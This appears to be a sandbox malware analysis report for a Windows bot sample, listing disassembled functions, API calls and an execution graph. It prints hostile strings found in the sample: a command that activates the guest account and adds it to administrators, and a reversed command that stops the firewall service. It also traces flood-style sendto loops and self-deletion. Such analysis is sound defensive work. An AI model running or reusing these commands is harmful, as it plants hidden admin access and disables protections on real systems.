                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exec_strrev
                                • String ID: sseccaderahs pots ten
                                • API String ID: 37789026-4286520837
                                • Opcode ID: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                • Instruction ID: c3e97b05e1a0e89978fc418c8abf29a90b807b51c292c120b08a6d1b6e549f13
                                • Opcode Fuzzy Hash: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                • Instruction Fuzzy Hash: 2EF0A77650060017D7189639DC556DB7B96ABC5320F44462CF75B872D0D9B98908C281
                                Function 1000B360 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29processCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B394
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Execwsprintf
                                • String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                                • API String ID: 3709078785-529560147
                                • Opcode ID: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                • Instruction ID: 0a7898c6996eab9a84bb7628cc6b94f02dfbc87351f9717496f3ad2297c58d40
                                • Opcode Fuzzy Hash: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                • Instruction Fuzzy Hash: 0FF0E5B56043007BF310C768DC44B8BB6A5ABD4704F00C939FB84D22A0EAF9D958C55A
                                Function 0040221D Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402245
                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402279
                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402293
                                • HeapFree.KERNEL32(00000000,?,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 004022AA
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocHeap$FreeVirtual
                                • String ID:
                                • API String ID: 3499195154-0
                                • Opcode ID: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                • Instruction ID: 68bd45274bd7996747cb266cb4e28ae1d64785b643fce2e0ad39ffcb9bf25311
                                • Opcode Fuzzy Hash: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                • Instruction Fuzzy Hash: 4D111C30200201AFD7319F58ED49E237BB5FBA47147A00639E556D61F1C7F0695ACB18
                                Function 10007160 Relevance: 5.0, APIs: 4, Instructions: 32stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?,?,?,100071F6,?,?,?,L$_RasDefaultCredentials#0), ref: 1000716E
                                • malloc.MSVCRT ref: 10007186
                                • lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,10007451,?), ref: 1000719B
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,10007451,?), ref: 100071A3
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$ByteCharMultiWidemalloc
                                • String ID:
                                • API String ID: 3822420913-0
                                • Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                • Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
                                • Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                • Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372

                                Execution Graph

                                Execution Coverage:25.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:21.5%
                                Total number of Nodes:618
                                Total number of Limit Nodes:11
                                execution_graph 1733 405244 LoadLibraryA GetProcAddress FindResourceA 1734 405284 LoadResource 1733->1734 1735 40532c 1733->1735 1734->1735 1737 40529f 1734->1737 1737->1735 1738 4052a8 LockResource 1737->1738 1738->1735 1739 4052b5 wsprintfA CreateFileA 1738->1739 1739->1735 1740 4052ed WriteFile SetFilePointer lstrlen WriteFile CloseHandle 1739->1740 1740->1735 1741 4027e4 1743 4027ed 1741->1743 1742 402967 realloc 1744 40281c 1742->1744 1743->1742 1743->1744 1304 406a48 __set_app_type __p__fmode __p__commode 1305 406ab7 1304->1305 1306 406acb 1305->1306 1307 406abf __setusermatherr 1305->1307 1316 406bb2 _controlfp 1306->1316 1307->1306 1309 406ad0 _initterm __getmainargs _initterm 1310 406b24 GetStartupInfoA 1309->1310 1312 406b58 GetModuleHandleA 1310->1312 1317 40597d WSAStartup 1312->1317 1316->1309 1327 4059f4 LoadLibraryA GetProcAddress _mbscpy _mbscat RegOpenKeyExA 1317->1327 1320 4059a1 StartServiceCtrlDispatcherA 1322 4059c1 exit _XcptFilter 1320->1322 1321 4059c7 1329 405b10 28 API calls 1321->1329 1328 40599d 1327->1328 1328->1320 1328->1321 1330 405c64 1329->1330 1344 405d26 1329->1344 1357 406bd0 LoadLibraryA GetProcAddress 1330->1357 1332 405c6b 1333 406bd0 2 API calls 1332->1333 1335 405c79 1333->1335 1334 406033 1359 40604d 1334->1359 1337 406bd0 2 API calls 1335->1337 1339 405c84 1337->1339 1340 406bd0 2 API calls 1339->1340 1341 405c8f 1340->1341 1342 406bd0 2 API calls 1341->1342 1343 405c9a 1342->1343 1345 406bd0 2 API calls 1343->1345 1344->1334 1348 405e3e GetLastError 1344->1348 1350 405e4b 1344->1350 1346 405ca5 wsprintfA _mbscat _mbscat 1345->1346 1347 405cf7 memset _mbscpy 1346->1347 1347->1344 1348->1350 1349 405e8c _mbscpy _mbscat 1351 405fbe lstrlen 1349->1351 1350->1334 1350->1349 1351->1334 1352 40355b LoadLibraryA GetProcAddress GetModuleFileNameA GetShortPathNameA GetEnvironmentVariableA 1353 403610 ShellExecuteEx 1352->1353 1355 4036bf ExitProcess 1353->1355 1356 40367f 6 API calls 1353->1356 1356->1355 1358 406bea 1357->1358 1358->1332 1360 406055 1359->1360 1361 40355b 12 API calls 1360->1361 1362 4059db 1361->1362 1362->1322 1362->1352 1745 4067e9 1748 406719 1745->1748 1746 40692b ??3@YAXPAX 1746->1748 1747 406926 1748->1746 1749 406953 free 1748->1749 1750 406723 strcmp 1748->1750 1751 40680c 1748->1751 1752 406974 1749->1752 1753 406969 GetTickCount 1749->1753 1750->1748 1754 406741 GetIfTable 1750->1754 1751->1747 1755 4068f1 sprintf _mbscpy 1751->1755 1756 4068b1 sprintf _mbscpy 1751->1756 1753->1752 1754->1748 1757 406787 ??2@YAPAXI 1754->1757 1755->1747 1756->1747 1757->1748 1758 4067b5 GetIfTable 1757->1758 1758->1746 1758->1748 1759 40588b LoadLibraryA GetProcAddress 1760 4058b3 1759->1760 1765 4058bd 1759->1765 1761 4058ba 1760->1761 1762 40593f Sleep 1760->1762 1764 405904 Sleep 1761->1764 1761->1765 1766 4058f5 1762->1766 1763 4058dd Sleep 1763->1766 1764->1766 1765->1763 1765->1766 1769 407470 6 API calls 1872 407440 1769->1872 1771 40756d socket 1840 407512 1771->1840 1772 406c10 4 API calls 1772->1840 1773 4078e2 RtlExitUserThread LoadLibraryA GetProcAddress 1774 407a2b 1773->1774 1775 40796f 1773->1775 1777 406bd0 2 API calls 1774->1777 1877 406c50 6 API calls 1775->1877 1779 407a31 1777->1779 1780 407a38 wsprintfA 1779->1780 1783 406bd0 2 API calls 1779->1783 1792 407a8a 1780->1792 1781 4079df 1785 407a23 RtlExitUserThread 1781->1785 1786 4079e7 CreateProcessA 1781->1786 1783->1780 1784 40761b inet_addr 1784->1840 1785->1774 1787 407a1d Sleep 1786->1787 1788 407a0d Sleep TerminateProcess 1786->1788 1787->1781 1788->1787 1789 407ae2 RtlExitUserThread LoadLibraryA GetProcAddress 1791 406c50 6 API calls 1789->1791 1790 406c10 4 API calls 1790->1792 1793 407b68 wsprintfA 1791->1793 1792->1789 1792->1790 1879 408680 socket 1792->1879 1794 407bf7 CreateProcessA 1793->1794 1802 407bc9 1793->1802 1796 407c21 Sleep TerminateProcess 1794->1796 1797 407c39 1794->1797 1796->1797 1799 406bd0 2 API calls 1797->1799 1798 407aad send 1803 407ad7 Sleep 1798->1803 1800 407c3f 1799->1800 1804 407c9b 1800->1804 1805 407c4d 1800->1805 1801 407d78 RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1807 406c10 4 API calls 1801->1807 1802->1801 1806 406c10 4 API calls 1802->1806 1813 408680 4 API calls 1802->1813 1803->1792 1810 407ca2 1804->1810 1811 407cdd 1804->1811 1808 407c52 wsprintfA 1805->1808 1809 407c76 wsprintfA 1805->1809 1806->1802 1838 407e08 1807->1838 1808->1802 1809->1802 1814 406bd0 2 API calls 1810->1814 1812 406bd0 2 API calls 1811->1812 1815 407ce2 1812->1815 1816 407d48 send 1813->1816 1817 407ca7 1814->1817 1818 406bd0 2 API calls 1815->1818 1822 407d6e Sleep 1816->1822 1820 406bd0 2 API calls 1817->1820 1821 407cf0 wsprintfA 1818->1821 1819 407e24 socket 1819->1838 1823 407cb5 wsprintfA 1820->1823 1821->1802 1822->1802 1823->1802 1824 407ecb RtlExitUserThread LoadLibraryA GetProcAddress 1825 407f3e 1824->1825 1826 407f7f 1824->1826 1827 406bd0 2 API calls 1825->1827 1828 406bd0 2 API calls 1826->1828 1829 407f4a 1827->1829 1830 407f8c 1828->1830 1832 406bd0 2 API calls 1829->1832 1833 406bd0 2 API calls 1830->1833 1831 406bd0 LoadLibraryA GetProcAddress 1831->1838 1834 407f58 wsprintfA 1832->1834 1835 407f9a wsprintfA 1833->1835 1846 407fbf 1834->1846 1835->1846 1836 407e92 sendto 1837 407eb5 Sleep 1836->1837 1836->1838 1837->1838 1838->1819 1838->1824 1838->1831 1838->1836 1839 40801d RtlExitUserThread LoadLibraryA GetProcAddress 1842 40808e 1839->1842 1840->1771 1840->1772 1840->1773 1840->1784 1841 407882 sendto 1840->1841 1841->1840 1844 408124 RtlExitUserThread 1842->1844 1845 40809b wsprintfA wsprintfA 1842->1845 1843 406c10 4 API calls 1843->1846 1848 408130 1844->1848 1847 406c10 4 API calls 1845->1847 1846->1839 1846->1843 1849 408680 4 API calls 1846->1849 1850 4080e6 1847->1850 1853 40815a 14 API calls 1848->1853 1851 407fef send 1849->1851 1852 408680 4 API calls 1850->1852 1854 408017 Sleep 1851->1854 1855 4080ef send 1852->1855 1858 408235 1853->1858 1854->1846 1856 408117 Sleep 1855->1856 1856->1842 1857 408261 1858->1857 1859 4082f9 1858->1859 1860 4085da 1858->1860 1861 406c10 4 API calls 1859->1861 1884 4085fe 1860->1884 1863 408355 inet_ntoa inet_addr 1861->1863 1866 4083ab 1863->1866 1864 4085e6 1867 4083c6 htonl 1866->1867 1870 4083f9 1867->1870 1868 408441 RtlExitUserThread 1868->1870 1869 4084ad sprintf inet_ntoa inet_addr htonl 1869->1870 1870->1868 1870->1869 1871 40858f sendto 1870->1871 1871->1870 1873 407448 1872->1873 1874 40744b 1872->1874 1873->1840 1887 407350 lstrlen ??2@YAPAXI 1874->1887 1876 40746a 1876->1840 1878 406ca5 wsprintfA 1877->1878 1878->1781 1880 408697 1879->1880 1881 40869e htons connect 1879->1881 1880->1798 1882 4086d0 closesocket 1881->1882 1883 4086df 1881->1883 1882->1798 1883->1798 1885 408603 1884->1885 1886 40860a WSACleanup 1884->1886 1885->1886 1886->1864 1888 4073be 1887->1888 1888->1876 1889 4086f0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1890 40879a 1889->1890 1891 4087a3 1890->1891 1892 406c10 4 API calls 1890->1892 1893 4087d5 1892->1893 1894 406bd0 2 API calls 1893->1894 1895 408806 inet_addr 1894->1895 1896 406c10 4 API calls 1895->1896 1897 408835 1896->1897 1898 406bd0 2 API calls 1897->1898 1899 408845 1898->1899 1900 406bd0 2 API calls 1899->1900 1901 40886a htonl 1900->1901 1906 40888e 1901->1906 1902 408abe RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1903 406c10 4 API calls 1902->1903 1939 408b59 1903->1939 1904 406bd0 LoadLibraryA GetProcAddress 1904->1906 1905 408b89 1906->1902 1906->1904 1907 406bd0 2 API calls 1906->1907 1931 408a5c sendto 1906->1931 1909 40898b wsprintfA 1907->1909 1908 408d18 RtlExitUserThread LoadLibraryA GetProcAddress 1922 408d5f 1908->1922 1910 406bd0 2 API calls 1909->1910 1911 4089af inet_addr 1910->1911 1913 406bd0 2 API calls 1911->1913 1912 408daf RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1914 406c10 4 API calls 1912->1914 1916 4089d6 1913->1916 1915 408e30 socket 1914->1915 1920 408e72 1915->1920 1918 406bd0 2 API calls 1916->1918 1921 4089ec htonl 1918->1921 1919 406c10 LoadLibraryA GetProcAddress inet_addr gethostbyname 1919->1922 1925 408ea8 RtlExitUserThread LoadLibraryA GetProcAddress 1920->1925 1927 408e86 sendto 1920->1927 1921->1906 1922->1912 1922->1919 1924 408680 socket htons connect closesocket 1922->1924 1932 408da6 Sleep 1922->1932 1923 408c23 wsprintfA 1926 408c47 inet_addr 1923->1926 1924->1922 1935 408f2e 1925->1935 1928 406c10 4 API calls 1926->1928 1927->1927 1929 408e9e Sleep 1927->1929 1928->1939 1929->1920 1930 408f80 RtlExitUserThread 1931->1906 1934 408ab1 Sleep 1931->1934 1932->1922 1933 406c10 4 API calls 1933->1935 1934->1906 1935->1930 1935->1933 1936 408680 4 API calls 1935->1936 1937 408f52 send 1936->1937 1938 408f7a Sleep 1937->1938 1938->1935 1939->1905 1939->1908 1939->1923 1940 408cd9 sendto 1939->1940 1940->1939 1941 408d09 Sleep 1940->1941 1941->1939 1942 408130 1960 408fb0 1942->1960 1944 40815a 14 API calls 1946 408235 1944->1946 1945 408261 1946->1945 1947 4082f9 1946->1947 1948 4085da 1946->1948 1949 406c10 4 API calls 1947->1949 1950 4085fe WSACleanup 1948->1950 1951 408355 inet_ntoa inet_addr 1949->1951 1952 4085e6 1950->1952 1954 4083ab 1951->1954 1955 4083c6 htonl 1954->1955 1958 4083f9 1955->1958 1956 408441 RtlExitUserThread 1956->1958 1957 4084ad sprintf inet_ntoa inet_addr htonl 1957->1958 1958->1956 1958->1957 1959 40858f sendto 1958->1959 1959->1958 1961 408fbc 1960->1961 1961->1944 1961->1961 1962 406db0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1963 406bd0 2 API calls 1962->1963 1964 406e06 1963->1964 1965 406bd0 2 API calls 1964->1965 1966 406e15 1965->1966 1967 406c10 4 API calls 1966->1967 1968 406e5d socket 1967->1968 1970 406e9f 1968->1970 1971 406edc 7 API calls 1970->1971 1972 406eb3 sendto 1970->1972 1973 406f58 1971->1973 1972->1972 1974 406ecb Sleep 1972->1974 1975 406c10 4 API calls 1973->1975 1974->1970 1974->1971 1976 406f8a socket connect 1975->1976 1977 406fb2 1976->1977 1978 406fc7 1976->1978 1979 406bd0 2 API calls 1978->1979 1980 406fd1 1979->1980 1981 406bd0 2 API calls 1980->1981 1982 406fe0 1981->1982 1983 407036 RtlExitUserThread 1982->1983 1984 40701e send Sleep 1982->1984 1986 408fb0 1983->1986 1984->1982 1987 40705a 6 API calls 1986->1987 1988 4070c0 1987->1988 1989 4070d9 1988->1989 1990 406c10 4 API calls 1988->1990 1991 4070f7 1990->1991 1992 406bd0 2 API calls 1991->1992 1993 407143 1992->1993 1994 406bd0 2 API calls 1993->1994 1995 407152 1994->1995 1996 4071aa RtlExitUserThread 1995->1996 1997 40718d sendto 1995->1997 2000 4071e5 1996->2000 1997->1995 1997->1997 1998 407214 RtlExitUserThread 1999 406c10 4 API calls 1999->2000 2000->1998 2000->1999 2001 408680 4 API calls 2000->2001 2002 407208 Sleep 2001->2002 2002->2000 2003 403114 Sleep 2004 402a37 2005 402a3c LoadLibraryA GetProcAddress 2004->2005 2006 406b9a _exit 1363 4055bc 6 API calls 1364 405610 SetServiceStatus Sleep 1363->1364 1365 405681 7 API calls 1364->1365 1366 4057b0 1365->1366 1367 40579c 1365->1367 1368 40580c WSAStartup CreateThread WSAStartup CreateThread 1366->1368 1380 405336 EnumResourceNamesA 1366->1380 1367->1366 1373 4057a6 exit 1367->1373 1369 405846 1368->1369 1552 405182 WSAStartup 1368->1552 1557 4051e3 WSAStartup 1368->1557 1400 4030fd CreateThread 1369->1400 1371 4057c4 wsprintfA 1381 405348 8 API calls 1371->1381 1373->1366 1375 405851 WaitForSingleObject CloseHandle closesocket Sleep 1375->1369 1378 4057ec 1378->1368 1379 4057f5 CreateThread Sleep 1378->1379 1379->1368 1562 402dd5 1379->1562 1380->1371 1382 40543f RegOpenKeyExA 1381->1382 1384 405472 memset RegQueryValueExA 1382->1384 1385 4054d0 1382->1385 1384->1385 1386 4054d5 RegCloseKey GetFileAttributesA 1384->1386 1399 4034e5 wsprintfA LoadLibraryA 1385->1399 1386->1385 1387 4054ea CreateFileA 1386->1387 1387->1385 1388 40550a GetFileSize 1387->1388 1389 405546 CloseHandle 1388->1389 1390 405519 GlobalAlloc 1388->1390 1389->1385 1390->1389 1391 405529 ReadFile 1390->1391 1392 405551 CloseHandle BeginUpdateResourceA 1391->1392 1393 40553d GlobalFree 1391->1393 1394 405569 UpdateResourceA 1392->1394 1395 4055ac GlobalFree 1392->1395 1393->1389 1396 405584 lstrlen UpdateResourceA 1394->1396 1397 40559b EndUpdateResourceA 1394->1397 1395->1385 1396->1397 1397->1395 1398 4055a9 1397->1398 1398->1395 1399->1378 1400->1375 1401 40387c 8 API calls 1400->1401 1450 40336c LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1401->1450 1407 40393b 1502 4034e5 wsprintfA LoadLibraryA 1407->1502 1409 403943 memcpy send 1411 403e32 1409->1411 1430 4039b7 1409->1430 1412 403a32 memset 1503 4036c6 1412->1503 1414 4036c6 3 API calls 1414->1430 1415 403e49 OpenMutexA 1419 403e6a 1415->1419 1420 403e5c ReleaseMutex CloseHandle 1415->1420 1416 403d7e GetTickCount wsprintfA 1431 403de6 LoadLibraryA GetProcAddress 1416->1431 1417 403bbd lstrcpyn 1521 403135 1417->1521 1418 403c8c OpenMutexA 1424 403c9f ReleaseMutex CloseHandle 1418->1424 1439 403cad 1418->1439 1527 40351a OpenSCManagerA 1419->1527 1420->1419 1422 403b3c lstrcpyn lstrlen lstrcpyn 1515 403280 1422->1515 1423 403c22 GetDesktopWindow ShellExecuteA 1423->1412 1424->1439 1427 403ace lstrcpyn lstrlen lstrcpyn 1509 403311 1427->1509 1430->1411 1430->1412 1430->1414 1430->1415 1430->1416 1430->1417 1430->1418 1430->1422 1430->1423 1430->1427 1435 403e0f WinExec 1431->1435 1433 403f44 1434 40355b 12 API calls 1433->1434 1436 403f49 ExitProcess 1434->1436 1435->1412 1437 406bd0 LoadLibraryA GetProcAddress 1437->1439 1439->1437 1440 406bd0 2 API calls 1439->1440 1441 403d1e wsprintfA 1440->1441 1442 403d48 LoadLibraryA GetProcAddress 1441->1442 1444 403d71 1442->1444 1443 403f50 1445 40351a 5 API calls 1443->1445 1444->1412 1444->1443 1446 403f56 memset sprintf SHDeleteKeyA 1445->1446 1447 40402a 1446->1447 1448 40355b 12 API calls 1447->1448 1449 40402f WinExec ExitProcess 1448->1449 1532 4029ce 1450->1532 1453 4033f2 memset strcspn strncpy strcspn atoi 1454 403445 1453->1454 1535 406c10 LoadLibraryA GetProcAddress inet_addr 1454->1535 1457 403482 1457->1411 1458 403492 setsockopt 1457->1458 1459 4034b2 WSAIoctl 1458->1459 1460 4034e3 memset 1458->1460 1459->1460 1461 406090 6 API calls 1460->1461 1462 406111 1461->1462 1463 40625c 1462->1463 1464 40623c _mbscpy 1462->1464 1465 40628b 1463->1465 1467 40626e _mbscpy 1463->1467 1464->1463 1466 4062bd 1465->1466 1468 40629d _mbscpy 1465->1468 1469 4062ef 1466->1469 1470 4062cf _mbscpy 1466->1470 1467->1465 1468->1466 1471 40634d 1469->1471 1474 40632d _mbscpy 1469->1474 1475 40630e _mbscpy 1469->1475 1470->1469 1472 4063ac 1471->1472 1477 40638c _mbscpy 1471->1477 1478 40636d _mbscpy 1471->1478 1473 40640e 1472->1473 1479 4063cc _mbscpy 1472->1479 1480 4063ee _mbscpy 1472->1480 1476 406440 sprintf _mbscpy lstrcpy RegOpenKeyExA 1473->1476 1481 406420 _mbscpy 1473->1481 1474->1471 1475->1471 1482 4065d6 _mbscpy 1476->1482 1483 40650e 6 API calls 1476->1483 1477->1472 1478->1472 1479->1473 1480->1473 1481->1476 1484 406655 GlobalMemoryStatusEx 1482->1484 1483->1484 1485 406686 __aulldiv 1484->1485 1486 406694 wsprintfA malloc GetAdaptersInfo 1485->1486 1487 406704 GetAdaptersInfo 1486->1487 1488 4066e7 free malloc 1486->1488 1489 406953 free 1487->1489 1497 406719 1487->1497 1488->1487 1490 406974 1489->1490 1491 406969 GetTickCount 1489->1491 1490->1407 1491->1490 1492 406723 strcmp 1493 406741 GetIfTable 1492->1493 1492->1497 1494 406787 ??2@YAPAXI 1493->1494 1493->1497 1495 4067b5 GetIfTable 1494->1495 1494->1497 1496 40692b ??3@YAXPAX 1495->1496 1495->1497 1496->1497 1497->1489 1497->1492 1497->1496 1499 40680c 1497->1499 1498 406926 1498->1407 1499->1498 1500 4068f1 sprintf _mbscpy 1499->1500 1501 4068b1 sprintf _mbscpy 1499->1501 1500->1498 1501->1498 1502->1409 1504 4036da 1503->1504 1505 4036df select 1503->1505 1504->1430 1505->1504 1508 403711 1505->1508 1506 403715 __WSAFDIsSet 1506->1505 1507 403728 recv 1506->1507 1507->1504 1507->1508 1508->1504 1508->1505 1508->1506 1510 403369 1509->1510 1511 403327 1509->1511 1510->1430 1514 403358 1511->1514 1542 4030fd CreateThread 1511->1542 1543 4030fd CreateThread 1514->1543 1516 40330d 1515->1516 1518 403299 1515->1518 1516->1430 1519 4030fd 137 API calls 1518->1519 1520 4032fc 1518->1520 1519->1518 1546 4030fd CreateThread 1520->1546 1522 40327c 1521->1522 1523 403150 1521->1523 1522->1430 1524 40326c 1523->1524 1548 4030fd CreateThread 1523->1548 1549 4030fd CreateThread 1524->1549 1528 40355a memset sprintf SHDeleteKeyA 1527->1528 1529 40352d OpenServiceA 1527->1529 1528->1433 1530 403555 CloseServiceHandle 1529->1530 1531 40354b DeleteService CloseServiceHandle 1529->1531 1530->1528 1531->1530 1538 4027b0 strlen malloc 1532->1538 1534 4029e8 _mbscpy strstr 1534->1453 1534->1454 1536 406c3a gethostbyname 1535->1536 1537 40345f socket connect 1535->1537 1536->1537 1537->1457 1540 4027ed 1538->1540 1539 402967 realloc 1541 40281c 1539->1541 1540->1539 1540->1541 1541->1534 1542->1511 1544 40387c 137 API calls 1542->1544 1543->1510 1545 40387c 137 API calls 1543->1545 1546->1516 1547 40387c 137 API calls 1546->1547 1548->1523 1550 40387c 137 API calls 1548->1550 1549->1522 1551 40387c 137 API calls 1549->1551 1553 4051a6 Sleep 1552->1553 1574 40507d time _localtime32 wsprintfA 1553->1574 1555 4051b4 atoi 1555->1553 1556 4051cc Sleep CreateThread 1555->1556 1575 4050ca WSAStartup 1556->1575 1558 405207 Sleep 1557->1558 1635 40507d time _localtime32 wsprintfA 1558->1635 1560 405215 atoi 1560->1558 1561 40522d Sleep CreateThread 1560->1561 1636 405126 WSAStartup 1561->1636 1699 402a59 WSAStartup 1562->1699 1565 402f96 gethostname 1567 402fc8 gethostbyname 1565->1567 1568 4030ed WSACleanup 1565->1568 1566 4030f8 1567->1568 1572 402fe2 1567->1572 1568->1566 1569 402ff3 memset memcpy 1570 403036 memset sprintf 1569->1570 1570->1572 1571 403093 Sleep 1571->1572 1572->1568 1572->1569 1572->1570 1572->1571 1701 402ad0 8 API calls 1572->1701 1574->1555 1576 4050e3 CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1575->1576 1576->1576 1577 40407c 9 API calls 1576->1577 1625 404044 socket connect 1577->1625 1580 40464f 1581 403492 2 API calls 1582 404127 memset 1581->1582 1583 406090 46 API calls 1582->1583 1584 404146 1583->1584 1628 4034e5 wsprintfA LoadLibraryA 1584->1628 1586 40414e 1587 404170 1586->1587 1588 404174 memcpy send 1586->1588 1587->1588 1589 40463d 1588->1589 1601 4041c2 1588->1601 1589->1580 1590 40423d memset 1629 403758 1590->1629 1592 403758 3 API calls 1592->1601 1593 404654 OpenMutexA 1596 404675 1593->1596 1597 404667 ReleaseMutex CloseHandle 1593->1597 1594 4043c8 lstrcpyn 1598 403135 137 API calls 1594->1598 1595 404497 OpenMutexA 1595->1601 1602 4044aa ReleaseMutex CloseHandle 1595->1602 1603 40351a 5 API calls 1596->1603 1597->1596 1598->1601 1599 404347 lstrcpyn lstrlen lstrcpyn 1605 403280 137 API calls 1599->1605 1600 40442d GetDesktopWindow ShellExecuteA 1600->1590 1601->1589 1601->1590 1601->1592 1601->1593 1601->1594 1601->1595 1601->1599 1601->1600 1604 4045c4 GetTickCount wsprintfA 1601->1604 1607 4042d9 lstrcpyn lstrlen lstrcpyn 1601->1607 1611 406bd0 LoadLibraryA GetProcAddress 1601->1611 1616 406bd0 2 API calls 1601->1616 1619 40475b 1601->1619 1602->1601 1606 40467b memset sprintf SHDeleteKeyA 1603->1606 1608 4045f1 LoadLibraryA GetProcAddress 1604->1608 1605->1601 1610 40474f 1606->1610 1609 403311 137 API calls 1607->1609 1613 40461a WinExec 1608->1613 1609->1601 1612 40355b 12 API calls 1610->1612 1611->1601 1614 404754 ExitProcess 1612->1614 1613->1590 1617 404529 wsprintfA 1616->1617 1618 404553 LoadLibraryA GetProcAddress 1617->1618 1618->1601 1620 40351a 5 API calls 1619->1620 1621 404761 memset sprintf SHDeleteKeyA 1620->1621 1622 404835 1621->1622 1623 40355b 12 API calls 1622->1623 1624 40483a WinExec ExitProcess 1623->1624 1626 404075 1625->1626 1627 404069 closesocket 1625->1627 1626->1580 1626->1581 1627->1626 1628->1586 1630 403771 select 1629->1630 1631 40376c 1629->1631 1630->1631 1634 4037a3 